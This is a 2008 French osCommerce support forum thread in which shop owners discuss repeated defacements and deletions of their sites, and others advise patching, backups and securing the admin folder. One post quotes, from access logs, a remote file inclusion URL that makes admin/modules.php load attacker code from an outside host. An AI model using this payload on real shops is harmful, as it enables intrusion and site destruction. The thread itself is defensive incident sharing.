Version imprimable du sujet

Écrit par : tidi 12 Jul 2008, 13:09

Bonjour,

Mon site a été victime ces deux derniers jours de hacker.

La première fois cela ne touchait que la page d'accueil et la on le retrouvait sur toutes les pages.

Il semble qu'ils n'arrivent pas à pénétrer le FTP ( et j'en ai d ailleur changé le mot de passe) car il sne suppriment pas tous les fichiers.

Ils arrivent à modifier le fichier index ou a injecter un fichier à eux.

Le contenu du premier fichier qui ne dérangeait que la page d'accueil était:
index.html

Écrit par : thierry_montpellier 12 Jul 2008, 14:39

Bonjour ,

Effectivement je souhaiterai avoir plus d'infos moi aussi car j'ai vu le problème du site en question !

Thierry

Écrit par : SambaMambo 12 Jul 2008, 14:44

utilisez vous customers_testimonials ?
si oui, il faut patché cet addon ...
ensuite vérifiez si vous avez tous ces correctifs :
http://www.oscommerce-fr.info/faq/category.php?cID=33

Écrit par : tidi 15 Jul 2008, 07:26

Bonjour,


Non je n'ai pas cette contrib customers_testimonials.

Merci pour ces patchs que j'avais vu mais pensais avoir sur ma boutique.

je vais les prendre un par un et vérifier qu'ils y soient.

Écrit par : flcflc 18 Jul 2008, 10:09

mutualisé ou dédié?

avez-vous contacté votre hébergeur pour savoir s'il s'agit d'un cas isolé auquel cas cela provient certainement d'une faille à définir (mot de passe, page mal codé suite à modification, mise à jour non effectuée...), soit c'est le serveur de votre hébergeur qui c'est fait attaqué et là il n'y a pas grand chose à faire que de tout réinstaller (changer les codes aussi).

Il existe une contrib en relation avec la création de thumbnails (dont j'ai perdu le nom) qui a une injection sql. Avez-vous ce type de contrib?

Écrit par : tidi 21 Jul 2008, 08:34

Bonjour,

merci pour ces pistes.

Du côté du serveur cela semble ok car aucun autre site qui est est deçu n'a été touché.
Il s'agit d'un dédié avec quelques sites dessus dont j'ai les adresses.

Je n'utilise pas de contrib pour la création de thumbnails.

La seule modif faite après recherche était sur la page contact_us que j'ai donc supprimer pour remettre celle d'origine.

Depuis je n'ai plus eu d'attaques donc j'en déduit que c'était elle qui me faisait défaut.

Il s'agissait de cette contrib:

http://www.oscommerce.com/community/contributions,4029/category,all/search,Contact+us+enhancement+1.3

En parallèle j'ai félicité le hacker alors est ce la page contact us ou mon e-mail qui l'a gratifié je ne sais toujours pas mais avec un peu de recul il semble que le problème soit résolu.

Écrit par : tidi 22 Jul 2008, 10:43

Bon je vous tiens au jus de mes nouvelles aventures avec mes amis hacker.

Je viens donc d'être victime d'un nouveau hack


Donc toujours même façon de faire.
Insertion d'un index.html et d'un nouveau index.php

Le hackeur est différent et a soumis un forum turc sur le sujet.

Je vais essayer de traduire ce forum et faire des recherches sur oscommerce dedans et vous tiendrai au courant.

En tout cas on peut éliminer la contrib dont je parlais au post préédent.

Écrit par : tidi 22 Jul 2008, 13:17

Bon bein voila ils sont parvenus à leur fin.

Tous les fichiers effacés


je vous tiendrai au courant

Écrit par : tidi 22 Jul 2008, 17:10

Bon je vois que ça a pas l'air de pationner les foules alors je vous préviens qu'oscommerce est clairement ciblé.

Voici une recherche dans google sur mon hacker.

**http://www.google.fr/search?q=c4panzer&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_frFR242FR242

Le nombre impressionnant de boutiques touchées montre clairement une faille peut être inconnue à ce jour.

Je recherche de mon côté mais sachez que j'ai été en contact avec mon webmaster ainsi qu'un autre touché par ce problème en France et qu'on ne voit pour l'instant la faille.

Écrit par : regne 22 Jul 2008, 18:41

Je suis pas en pro en hack mais si il a reussi a tout effacer de ton FTP je vois 2 solutions rapide :

- soit ton mot de passe est super simple a trouver (ex : je vends des habit nike et mon MDP=nike)
- soit il a reussi a uploader un fichier sur ton serveur... par je ne sais quel moyen...

Le resultat est qu'en fouillant tes fichiers log tu devrai peut etre trouver une piste non?

Écrit par : tidi 22 Jul 2008, 19:06

merci de ton soutien.

mais le problème ne vient pas du ftp.

En effet entre les diverses attaques le mot de passe qui étaient tres complexe car générés automatiquement ne peuvent pas être le problème.

Ensuite les logs tracent justement ce qu'il se passe sur le ftp et là ils sont passés par une injection de script.

D'après les hackers que je piste le problème viendrait du fichier include et de son contenu.

Écrit par : regne 22 Jul 2008, 19:13

euh si je ne me trompe pas il me semble que les logs ne trace pas que le FTP... peut etre quelqu'un pourra confirmer ou corriger...


Pour le include je ne vois pas a quel endroit dans osc on fait un include qui serai propice a du hack

ex: www.monsite.fr/index.php?inc=test.php

et encore il faudrait vraiment que le code ne soit pas protegé et que l'on puisse faire :

www.monsite.fr/index.php?inc=www.google.fr

Dans ce cas la il serai facile de hacker ton site...


Personnellement j'ai un site qui utilise ce système et il est vrai que je subit des tentatives de hack tout les jours depuis maintenant 2 ans ... mais heureusement pour moi sans succès !


honnetement sur du code propre comme osc le plus probable reste le MDP ... mai si tu est sure de ce coté la... je ne peux pas t'aider plus...

Courage

Écrit par : tidi 22 Jul 2008, 20:27

merci en tout cas de ton soutien

Je parlais du repertoire include.

Ecoute je vois ça avec mon programmeur .

Merci encore

Écrit par : coconimo 24 Jul 2008, 11:08

bjr
au risque de te decevoir tidi, j'ai regardé de plus près les exploits de ton hacker sur google, et l'ensemble des boutiques attaquées sont soit basées sur des templates, soit sont des versions anciennes (de 2003) et rarement en production. Je pencherai donc sur une mise à jour des patchs de sécurité de base qui a été ratée.

Écrit par : tidi 24 Jul 2008, 13:26

Bonjour,

Merci coconimo, mon webmaster a effectivement revu les patchs et mon site et effectivement il manquait semble t il des patchs.

Avant de crier victoire j'attends la suite.

Désolé si ce post a servi à rien vu qu'au départ les patchs étaient soit disant sur la boutique.

S'il y a du nouveau je vous tiens au courant.

Écrit par : Manu64 24 Jul 2008, 18:21

Bonsoir Tidi.

Ok, tu interveins si il y a de nouveau des attaques. La voie du manque de correctifs semblent être la bonne. On ne le dit pas assez : Mise à jour - Mise à jour. Et, surtout, sauvegarde hebdomadaire minimum en cas de "pépin".

Écrit par : tidi 25 Jul 2008, 11:54

Merci de ton intervention.

Effectivement pensez bien à faire des sauvegardes car depuis 3 mois je ne l'avais pas fait pour le dossier image et je suis obligé de me retaper plus de 1000 photos.

On court partout et puis des fois on oublie l'essentiel.

Pourtant j'avais mis en place une sauvegarde de la BD toutes les douze heures, les fichiers qui sont modifiés sont très souvent sauvegardés aussi et puis voila un oublie un coup de trafalgar et on perd son temps.

Écrit par : riziere 6 Aug 2008, 17:10

Ma boutique a été hackée plusieurs fois elle aussi. Un hack classique avec simple remplacement de la home.

Elle était en développement donc pas protégé par mot de passe sur la partie admin avec un htaccess.

J'ai pu lire les logs d'accès de la boutique et il s'avère que notre gars avait utilisé une faille de sécurité dans admin/modules.php
Il s'agit visiblement d'une variable non protégée qu'il a utilisé pour injecter un fichiet txt contenant du code et lui permettant d'avoir plus amples accès au serveur.

L'attaque se passant ainsi ADRESSE_DE_LA_BOUTIQUE/admin/modules.php?module_directory=http://www.SUPPRIME_PAR_MOI.com/bot4-id.txt

Je vais voir de mon côté comment je peux bloquer ça. Si vous avez vous aussi une solution (a part fermer boutique ^^) n'hésitez pas à partager.

Je précise que j'utilise la dernière MS téléchareable depuis ce site.

PS : Si votre niveau d'anglais le permet, peut-être pourriez-vous envoyer cette info de ma part à la team de dev d'Oscommerce ?

Écrit par : coconimo 6 Aug 2008, 20:12

Citation (riziere @ 6 Aug 2008, 19:10)

Écrit par : riziere 7 Aug 2008, 09:28

Citation (coconimo @ 6 Aug 2008, 22:12)

Citation (riziere @ 6 Aug 2008, 19:10)

Ma boutique a été hackée plusieurs fois elle aussi. Un hack classique avec simple remplacement de la home.

Elle était en développement donc pas protégé par mot de passe sur la partie admin avec un htaccess.

.../...

PS : Si votre niveau d'anglais le permet, peut-être pourriez-vous envoyer cette info de ma part à la team de dev d'Oscommerce ?

à lire d'urgence : http://www.oscommerce-fr.info/forum/index.php?showtopic=56509

Écrit par : Gnidhal 7 Aug 2008, 11:20

Citation (riziere @ 7 Aug 2008, 10:28)

PS, dans le post qu'on vient de me proposer il est fait mention de "cross scripting" en ces termes :
osCommerce n'a aucune faille connue de ce type (il en avait, mais les versions récentes depuis 2 ans sont résistantes à ce genre d'attaque)
Et pourtant

Écrit par : riziere 7 Aug 2008, 17:01

Bon ok vous êtes tous les maîtres d'Oscommerce et vous savez tous mieux, ok ça je l'ai compris !

Mais franchement vous prenez le problème à l'envers là.

Je vous signale un moyen utilisé par un hacker pour entrer dans l'architecture de la boutique. Bêtement (oui car je suis très bête de partager mes infos comme j'aime aussi qu'on les partage avec moi) j'ai pensé que cela intéresserai la communauté de le savoir.

Au final quoi ? Bah c'est moi qui me fais clouer au pilori. Oui j'ai été con. Oui je plaide coupable. Oui la méga honte, je n’ai pas mis tout de suite un htaccess sur mon admin et je m'en suis expliqué. Je m'en sens tellement accablé que je vais m'enterrer sous six pieds de terre avec quatre pieux dans le coeur et les yeux ! Voilà !

Maintenant, contrairement à ce que vous sous entendez, je ne viens pas pleurnicher, je viens vous dire qu'il y a eu ça, que j'ai trouvé comment le gars a fait et vous en apporte même les éléments. Parce que je croyais que c'était utile.

Effectivement si j'avais mis ce foutu htaccess ce ne serait pas arrivé mais voilà c'est arrivé et je vous fais partager mon expérience pour que ca n'arrive pas à d'autre. Voire même éventuellement fermer la porte utilisée par ce hacker.

Après, si vous préférez les œillères, libre à vous.

Écrit par : Rogers 7 Aug 2008, 19:37

Ce que te dis gentiment Gnidal, c'est que l'admin DOIT être sécurisé. A chacun sa méthode. Certains changent le nom du répertoire, d'autres ajoutent un htaccess, d'autres encore y rajoutent une contrib de connexion à l'admin et d'autres utilisent les 3 à la fois. Il y a de nombreuses méthodes. Je n'ai pas refais une install de Oscommerce depuis des années mais il me semble qu'à la fin de l'install, il est bien indiqué de sécuriser l'admin. Donc pour en revenir au problème d'œillère, l'admin est sécurisé vu que chacun doit le faire à l'install. Il n'y a pas de faille. Ce n'est pas comme la faille de je ne sais plus laquelle contrib WYSIWYG de l'admin qui elle était exploitable l'admin sécurisé ou non.

La faille que tu indiques, elles n'est pas exploitable si l'admin est sécurisé. Et si tu regardes bien, dans Google, on peut détecter certaines boutiques qui n'ont pas d'admin sécurisés. Elles sont toutes hackées. Par contre, je connais pas ou peu de boutique hackée depuis le front office (la partie catalogue). Pourquoi ? Parce qu'il s'agit de la partie publique et que tous les efforts ont été fait dessus.

Écrit par : Gnidhal 7 Aug 2008, 21:41

Ma remarque est sur le fait que tu parlais de faille de sécurité et je souligne, si c'est encore nécessaire, qu'il n'y a pas de faille mais négligeance de l'utilisateur.
Ok Riziere, tu nous signales avoir fait une erreur, que cette erreur a permis à un pirate de hacker ton site et tu tiens à en informer la communauté, c'est louable à toi.
Et nous l'avons entendu, merci encore de ce témoignage en espérant qu'il servira de leçon aux autres utilisateurs.

Bien cordialement, ce sujet est clos.